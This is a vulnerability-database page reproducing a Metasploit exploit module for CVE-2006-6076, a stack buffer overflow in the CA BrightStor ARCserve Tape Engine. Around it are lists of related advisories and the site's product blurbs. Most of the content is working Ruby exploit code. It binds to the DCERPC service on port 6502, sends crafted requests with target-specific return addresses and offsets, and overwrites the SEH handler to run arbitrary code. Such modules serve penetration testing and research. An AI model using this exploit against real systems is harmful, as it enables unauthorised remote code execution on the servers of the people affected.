Vulners
Lucene search
CA BrightStor ARCserve Tape Engine Buffer Overflow
🗓️ 18 Jan 2007 02:57:52Reported by MC <[email protected]>, aushack <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 26 Views
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | CA BrightStor ARCserve Backup Multiple Vulnerabilities (QO84983) | 15 Jan 200700:00 | – | nessus |
| CA BrightStor ARCserve Backup Tape Engine and Portmapper Multiple Vulnerabilities (QO86255) | 16 Mar 200700:00 | – | nessus |
| CA BrightStor ARCserve Backup Tape Engine Multiple Remote Overflows (QO84983) | 12 Jan 200700:00 | – | nessus |
 | CVE-2006-6076 | 9 May 201000:00 | – | circl |
 | CA BrightStor Tape Engine Buffer Overflow - Ver2 (CVE-2006-6076) | 16 Apr 201400:00 | – | checkpoint_advisories |
 | CVE-2006-6076 | 24 Nov 200617:00 | – | cve |
 | CVE-2006-6076 | 24 Nov 200617:00 | – | cvelist |
 | CA BrightStor ARCserve - Tape Engine Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb |
 | KLA10093 Multiple vulnerabilities in CA software | 20 Mar 200700:00 | – | kaspersky |
 | CVE-2006-6076 | 24 Nov 200617:07 | – | nvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Tape Engine Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC', 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2006-6076' ],
[ 'OSVDB', '30637' ],
[ 'BID', '21221' ],
[ 'EDB', '3086' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -9500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.1', { 'Ret' => 0x2380cdc7, 'Offset' => 1158 } ], #p/p/r cheyprod.dll 07/21/2004
[ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5, 'Offset' => 1132 } ], #p/p/r cheyprod.dll ??/??/????
],
'DisclosureDate' => '2006-11-21',
'DefaultTarget' => 1))
register_options([ Opt::RPORT(6502) ])
end
def exploit
connect
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
request = "\x00\x04\x08\x0c\x02\x00\x00\x00\x00\x00"
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
dcerpc.call(43, request)
filler = "\x10\x09\xf9\x77" + rand_text_english(target['Offset'])
seh = generate_seh_payload(target.ret)
sploit = filler + seh
print_status("Trying target #{target.name}...")
begin
dcerpc_call(38, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.8High risk
Vulners AI Score7.8
CVSS 210
EPSS0.68994